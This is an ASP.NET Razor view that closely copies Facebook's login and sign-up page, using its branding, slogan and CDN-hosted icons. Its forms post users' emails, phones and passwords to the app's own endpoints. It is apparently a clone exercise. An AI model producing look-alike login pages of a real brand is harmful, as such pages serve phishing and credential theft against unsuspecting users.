@{
    Layout = null;
}
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Login or SignUp</title>
    <link href="~/Css/style.css" rel="stylesheet" />
</head>

<body>

    <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700' rel='stylesheet' type='text/css'>

    <div id="navwrapper">
        <div id="navbar">
            <form action="/User/Login" method="post">
                <table class="tablewrapper">
                    <tr>
                        <td class="row1">Email or Phone</td>
                        <td class="row1">Password</td>
                    </tr>
                    <tr>
                        <td>
                            <input type="text" class="inputtext" name="Email" placeholder="Enter your email">
                        </td>
                        <td>
                            <input type="password" class="inputtext" name="Password" placeholder="Enter your password">
                        </td>
                        <td><button class="btn-block bg-info" type="submit">Log In</button></td>
                    </tr>
                    <tr>
                        <td>
                            <div class="row2"><input type="checkbox" checked>Keep me logged in</div>
                        </td>
                        <td class="row2 h">Forgot your password?</td>
                </table>

                <h1 class="logowrapper">facebook</h1>
            </form>
        </div>
    </div>

    <div id="contentwrapper">
        <div id="content">

            <div id="leftbod">

                <div class="connect bolder">
                    Connect with friends and the
                    world around you on Facebook.
                </div>

                <div class="leftbar">
                    <img src="https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xap1/t39.2365-6/851565_602269956474188_918638970_n.png" alt="" class="iconwrap fb1" />
                    <div class="fb1">
                        <span class="rowtext">See photos and updates</span>
                        <span class="rowtext2 fb1">from friends in News Feed</span>
                    </div>
                </div>

                <div class="leftbar">
                    <img src="https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xap1/t39.2365-6/851585_216271631855613_2121533625_n.png" alt="" class="iconwrap fb1" />
                    <div class="fb1">
                        <span class="rowtext">Share what's new</span>
                        <span class="rowtext2 fb1">in your life on your timeline</span>
                    </div>
                </div>

                <div class="leftbar">
                    <img src="https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xap1/t39.2365-6/851558_160351450817973_1678868765_n.png " alt="" class="iconwrap fb1" />
                    <div class="fb1">
                        <span class="rowtext">Find more</span>
                        <span class="rowtext2 fb1">of what you're looking for with graph search</span>
                    </div>
                </div>


            </div>

            <div id="rightbod">
                <div class="signup bolder">Sign Up</div>
                <div class="free bolder">It's free and always will be</div>

                <form action="/User/SignUp" method="post">
                    <div class="formbox">
                        <input type="text" class="inputbody in2" name="Name" placeholder="Name and Last Name">
                    </div>

                    <div class="formbox">
                        <input type="text" class="inputbody in2" name="Email" placeholder="Email">
                    </div>
                    <div class="formbox">
                        <input type="password" class="inputbody in2" name="Password" placeholder="New password">
                    </div>
                    <div class="formbox">
                        <div class="agree">
                            By clicking Sign Up, you agree to our <div class="link">Terms</div> and that you have read our <div class="link">Data Use Policy</div>, including our <div class="link">Cookie Use</div>.
                        </div>
                    </div>
                    <div class="formbox">
                        <button type="submit" class="signbut bolder">Sign Up</button>
                    </div>
                </form>
                <div class="formbox">
                    <div class="create"><div class="link h">Create a Page</div> for a celebrity, band or business.</div>
                </div>
            </div>
        </div>
    </div>



</body>

</html>
